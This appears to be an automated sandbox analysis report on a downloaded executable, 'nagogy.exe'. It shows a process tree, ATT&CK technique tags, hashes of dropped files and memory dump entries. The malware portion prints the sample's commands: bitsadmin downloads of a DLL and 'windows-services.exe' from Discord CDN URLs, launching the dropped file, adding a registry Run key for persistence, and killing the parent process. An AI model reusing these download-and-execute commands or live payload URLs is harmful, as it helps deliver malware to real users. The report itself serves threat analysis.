  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6712 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5816 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=8768 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9976 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:2884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=8872 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8832 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8912 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:5184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8680 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6752 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6544 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=9720 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=9732 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6008 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6748 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8864 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:5960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9496 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=9460 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=9664 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=7612 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=7544 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=10444 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:2576

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4720

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3000

C:\Users\Admin\Downloads\nagogy.exe
"C:\Users\Admin\Downloads\nagogy.exe"
1⤵
- Executes dropped EXE
PID:5324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "%LOCALAPPDATA%\Temp\libcurl-x64.dll" >nul
  2⤵
  PID:5144
- - C:\Windows\system32\cmd.exe
    cmd /c bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
    3⤵
    PID:5088
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
      4⤵
      Download via BitsAdmin
      PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "%LOCALAPPDATA%\Temp\windows-services.exe" >nul
  2⤵
  PID:5772
- - C:\Windows\system32\cmd.exe
    cmd /c bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
    3⤵
    PID:1544
  - - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
      4⤵
      Download via BitsAdmin
      PID:6012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c start "" "%LOCALAPPDATA%\Temp\windows-services.exe"
  2⤵
  PID:2536
- - C:\Windows\system32\cmd.exe
    cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
    3⤵
    PID:292
  - - C:\Users\Admin\AppData\Local\Temp\windows-services.exe
      "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:360
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c exit
        5⤵
        
        PID:4920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill nagogy.exe
        5⤵
        
        PID:304
      - C:\Windows\system32\taskkill.exe
        
        taskkill nagogy.exe
        6⤵
        Kills process with taskkill
        
        PID:3388
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /F /IM nagogy.exe
        5⤵
        
        PID:3984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM nagogy.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /F /IM nagogy.exe
        5⤵
        
        PID:5024
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM nagogy.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start powershell -NoLogo -WindowStyle Hidden -Command Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('heloo', 'Error', 'OK', 'Error'); exit
        5⤵
        
        PID:3224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoLogo -WindowStyle Hidden -Command Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('heloo', 'Error', 'OK', 'Error'); exit
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\43aea6ba-7e22-4993-baa7-0cf24815915f.tmp

Filesize
5KB

MD5
56291ad3aa1f7fed390782d728b966bf

SHA1
bcf9608614a3edc27de405cd5973510c54e824e3

SHA256
5b1e2b4b718a52201dbb2914d151a8781f31f199a0baabf0e8309eef7c82de0e

SHA512
e49479250e77da8e52fc07898659e404e4aaa130e020d1878dedad4a76dc07cfa8b5bc647b316986b24277806962e07ae22ee32330bc9a8487ed5b5587b974e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
33f10537a79e6cc350a71afa3293e9cd

SHA1
8970225bd0f82fd3ad0ea93038c93a1ac5ae1b90

SHA256
fd2281d85c03f2a84613db6e81f75184b3e023e895374da4f74b51a4f443e0d3

SHA512
13eed7de2342728fac210cf0ab05cc941970f23deb20f6a48f6449e60438b5bfdce0c71b9edc0c774e524ba0ab3ec4d793feafa6ca3b54e8d552a2b029aa7a19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
14KB

MD5
360e38e260b92d2b61e3ec54daf3bc1e

SHA1
64522bf7786785690335a9949eda6dc1b0a9b461

SHA256
3fc41cca866f9635cf8002fd9cda55f5d3e45a3a642cd3a8cad3f5684ace7e20

SHA512
6bb8f65050fb3580bd6b3145bc8cd56b02bebb14799ab1773afb933f4e8a3b181bf070cfa6dbdb4c84a787359d1ba556f77a50c93804e4fff2bea37ac97746e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
a5f05bd9786c43e07b1fc67a0f3e258d

SHA1
0ae3eb8f0f2ac417dd7715d12ef0c431b337f094

SHA256
f9c26b07557188b8a31aabd4a4451a13c629b3925cc68f92d2999c6c7beb976d

SHA512
622e0421c61279632276b6362dfec12568bb714ba572999cc701df0174f4367806b49c3b7b992fe8e57c67493e2aa067995d65c34d6d715c1c428fb6982eeb9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
322b3149c7f5dd524548fd10fb214ce8

SHA1
c90e0b9a3581228de0b86b4f460e221464c6a678

SHA256
5c2df1fbf832725c6d08e04b663e419be65b8a87a2d4aff7bc58be0b1cf01cdf

SHA512
46a231b2b3385226e26859d5ddf8bf748980a0f992a7672f5577bda786876d4c17413d0ef37c54f366875a63b1192b774d934e4cab555502d24ab26dc6bce969

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
62ca7099db0ec17e499ed53ce5cb6d82

SHA1
188e4add6312b7df1baa2b06eda6c0a670ccf9a8

SHA256
624a9e66c7cb4425fd8d3766f806065ed565142c1a3852fb85b25722fdbf24e5

SHA512
99257f8bd2a9c02bf65cb53a94f85515f501f8b98520fe794173b99088d46014209f26851b768fe276b394faf7582ea76d787e1b25807c26b0bc2888961b17ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
054c721016c84d5a731b449cd3db9ee1

SHA1
c31924df8bc6032f56f2ce971a2e6d34c09fe42a

SHA256
acb8081d237ce7dee52599b923752063e4d52b84e51c5749d2120110b84de2ec

SHA512
c74342f1211608cf180ca7bbf59bee44638544a918007f3a8e87414a9685c315defac74bfbe62afae72ea3deb0f33551db5cc2c9411eaf7506493146df462d89

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
343e162d66da644f3b098cbb80bf4b1e

SHA1
afc12a045b0bf6bac21e656c9134df6d958a5ff2

SHA256
04655cee421c17cacc025909da993a4acbf0e4a9c22dd30329cfd4c79f817f1e

SHA512
9db64b1c6b5b8fa9558cb9348ca5d736edd630165f4d7c1b04bfeb0d330ac94112b386b145d776519b72147e7b3d3a5827d47f5fdede54ec75745132b9fe542d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
bae2377691e5aef64e8ee3efcb827f14

SHA1
9ebbe1af08a86752acbede8ba939d74038f5ec08

SHA256
a3717c698d4af67246276f4430806398d0a0b25236148caf7d089acb7ee63ec7

SHA512
1e92b42265109d03b5a014717d46de6d86fd8af3a79ad14de2411b5396dc096f298bbd388a53238ebd445d19e17cb6ef0d45777838cad51868972f48b818343e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
72KB

MD5
2aeccd3cf07306334b952b9b9f3fe4fa

SHA1
7ac535c14f7ca07d9825297a1a96f9ad1bd38512

SHA256
4b372194ea8d96c0fb4f5b1e04923692d1469a7cbaf5b3a94e2165ca6fedbf5b

SHA512
40a5670d2eeec1c445bf3aa54ac5fa5777757e58914c4c00048e3f51afa7da6628c02909c442e383fe58c5434c83f32bcca6dbd5ce0bae08b76d7034b00678fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1bkicef.xjh.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\windows-services.exe

Filesize
1.5MB

MD5
145c82eac6e9ae812e0ebb26fe45cec9

SHA1
2602f1d8a3a5b622177f8d3538c0bd835587c6ad

SHA256
ffaa41d091b33948da7de24465f2a8a764329d3914589f326ae8d4992f851cf5

SHA512
17325b5af8d2688acbdfb9714a0e4d545412247fa41eac5a14d1508f54504e5de4b9e065102d652406469b63ebf3ee8543ffbb6e3f9095a99ab8da4b3cfabaf5

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 671756.crdownload

Filesize
75KB

MD5
db96c24c1c185b963d6c6e2d6fb122e2

SHA1
a86195f8cf5a8a811ebe4376ce581778868ce658

SHA256
15391b7ee5cf801eff769400bc5ef7442d3054b055a272029f9bcfea3e2f4af9

SHA512
c910f5cb2c0196861186e4f47f0b8bf81da2e02d8b8900bc17d14fd9e23022278f326ce084606ede36f12038fcee3cccc8220f33d68e99273802a63bd067f51e

Download Submit
C:\Users\Admin\Downloads\nagogy.exe

Filesize
75KB

MD5
db96c24c1c185b963d6c6e2d6fb122e2

SHA1
a86195f8cf5a8a811ebe4376ce581778868ce658

SHA256
15391b7ee5cf801eff769400bc5ef7442d3054b055a272029f9bcfea3e2f4af9

SHA512
c910f5cb2c0196861186e4f47f0b8bf81da2e02d8b8900bc17d14fd9e23022278f326ce084606ede36f12038fcee3cccc8220f33d68e99273802a63bd067f51e

Download Submit
C:\Users\Admin\Downloads\nagogy.exe

Filesize
75KB

MD5
db96c24c1c185b963d6c6e2d6fb122e2

SHA1
a86195f8cf5a8a811ebe4376ce581778868ce658

SHA256
15391b7ee5cf801eff769400bc5ef7442d3054b055a272029f9bcfea3e2f4af9

SHA512
c910f5cb2c0196861186e4f47f0b8bf81da2e02d8b8900bc17d14fd9e23022278f326ce084606ede36f12038fcee3cccc8220f33d68e99273802a63bd067f51e

Download Submit
C:\Users\Admin\Downloads\nagogy.exe

Filesize
75KB

MD5
db96c24c1c185b963d6c6e2d6fb122e2

SHA1
a86195f8cf5a8a811ebe4376ce581778868ce658

SHA256
15391b7ee5cf801eff769400bc5ef7442d3054b055a272029f9bcfea3e2f4af9

SHA512
c910f5cb2c0196861186e4f47f0b8bf81da2e02d8b8900bc17d14fd9e23022278f326ce084606ede36f12038fcee3cccc8220f33d68e99273802a63bd067f51e

Download Submit
memory/360-584-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/360-590-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/360-588-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4836-577-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4836-582-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4836-591-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/5316-576-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/5316-373-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/5324-581-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/5948-607-0x000002EAD54A0000-0x000002EAD54C2000-memory.dmp

Filesize
136KB

Download
memory/5948-608-0x000002EAEDA40000-0x000002EAEDA50000-memory.dmp

Filesize
64KB

Download
memory/5948-609-0x000002EAEDA40000-0x000002EAEDA50000-memory.dmp

Filesize
64KB

Download
memory/5948-612-0x000002EAEDBD0000-0x000002EAEDC46000-memory.dmp

Filesize
472KB

Download